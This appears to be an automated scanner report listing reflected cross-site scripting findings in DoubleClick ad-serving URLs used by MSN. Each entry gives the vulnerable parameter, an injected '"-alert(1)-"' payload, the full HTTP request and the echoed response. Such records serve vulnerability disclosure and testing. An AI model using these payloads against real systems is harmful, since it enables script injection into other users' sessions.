<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/f/163/%2a/f%3B240320616%3B0-0%3B0%3B62289812%3B3454-728/90%3B41844250/41862037/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1lsc32f1"-alert(1)-"34398203435&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdh ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f26"-alert(1)-"730d1c99e22 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... JobMapFree_YahooTax_954x60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c10f"-alert(1)-"a01146a9b07 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4995c"-alert(1)-"15005a1e215 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/j ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d7f"-alert(1)-"cc146351d59 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]...
var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs%3D%3fhttp ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b59f2"-alert(1)-"a445a26e2b7 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/ ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d1cb"-alert(1)-"68a2a9ab89b was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Scroll_FREE_N_954x60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 121f1"-alert(1)-"a54ea376143 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/job_map_f?cid= ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1ecf"-alert(1)-"c71a3ff6507 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 7/TT_CoreGPS_JobMapFree_YahooTax_954x60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B6243129 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b7d"-alert(1)-"d594f3953b8 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=843190458b7d"-alert(1)-"d594f3953b8&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cce8"-alert(1)-"9bf53ef1aeb was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=5711655104cce8"-alert(1)-"9bf53ef1aeb&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84d99"-alert(1)-"61719917f50 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e84d99"-alert(1)-"61719917f50&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54eb3"-alert(1)-"db1f9ed8dee was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR54eb3"-alert(1)-"db1f9ed8dee&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90776"-alert(1)-"bf4f4a050a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=836734390776"-alert(1)-"bf4f4a050a&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2b0c"-alert(1)-"b64a598cf19 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=Gb2b0c"-alert(1)-"b64a598cf19&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edbfd"-alert(1)-"dcc08de5e14 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=edbfd"-alert(1)-"dcc08de5e14 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 522ce"-alert(1)-"6f4be5c894c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!522ce"-alert(1)-"6f4be5c894c&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e97dd"-alert(1)-"9bf7dd8f0c5 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
